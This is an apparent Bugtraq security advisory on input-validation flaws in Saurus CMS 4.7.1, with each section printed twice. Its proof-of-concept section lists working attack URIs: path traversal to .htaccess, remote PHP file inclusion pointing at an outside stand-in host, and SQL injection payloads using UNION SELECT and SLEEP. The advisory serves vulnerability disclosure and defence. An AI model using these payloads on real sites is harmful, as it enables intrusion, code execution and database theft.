Saurus CMS Multiple Input Validation Vulnerabilities
BID:61161
Info
Saurus CMS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 61161 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 14 2013 12:00AM |
| Updated: | Jul 14 2013 12:00AM |
| Credit: | Janek Vind |
| Vulnerable: |
Saurused Ltd Saurus CMS 4.7.1 |
| Not Vulnerable: | |
Discussion
Saurus CMS Multiple Input Validation Vulnerabilities
Saurus CMS is prone to multiple input-validation vulnerabilities.
An attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the website, steal cookie-based credentials, include and execute arbitrary PHP code, disclose sensitive information, access or modify data, or exploit vulnerabilities in the underlying database. Other attacks are also possible.
Saurus CMS 4.7.1 is vulnerable; other versions may also be affected.
Saurus CMS is prone to multiple input-validation vulnerabilities.
An attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the website, steal cookie-based credentials, include and execute arbitrary PHP code, disclose sensitive information, access or modify data, or exploit vulnerabilities in the underlying database. Other attacks are also possible.
Saurus CMS 4.7.1 is vulnerable; other versions may also be affected.
Exploit / POC
Saurus CMS Multiple Input Validation Vulnerabilities
Attackers can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess
http://www.example.com/saurus471/extensions/saurus4/captcha_image.php?captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50&captcha[effects][0][name]=../waraxe
http://www.example.com/saurus471/map.php?cmd=www.example2.com\test.php
http://www.example.com/saurus471/admin/change_config.php?class_path=www.example2.com/?
http://www.example.com/saurus471/admin/repair_database.php?class_path=www.example2.com/?
http://www.example.com/saurus471/admin/check_adminpage.php?class_path=http://php.net/?
http://www.example.com/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23
http://www.example.com/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23
http://www.example.com/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://www.example.com/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://www.example.com/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://www.example.com/saurus471/admin/extensions.php?sortby=1
http://www.example.com/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt
Attackers can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess
http://www.example.com/saurus471/extensions/saurus4/captcha_image.php?captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50&captcha[effects][0][name]=../waraxe
http://www.example.com/saurus471/map.php?cmd=www.example2.com\test.php
http://www.example.com/saurus471/admin/change_config.php?class_path=www.example2.com/?
http://www.example.com/saurus471/admin/repair_database.php?class_path=www.example2.com/?
http://www.example.com/saurus471/admin/check_adminpage.php?class_path=http://php.net/?
http://www.example.com/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23
http://www.example.com/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23
http://www.example.com/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://www.example.com/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://www.example.com/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23
http://www.example.com/saurus471/admin/extensions.php?sortby=1
http://www.example.com/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt
Solution / Fix
Saurus CMS Multiple Input Validation Vulnerabilities
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.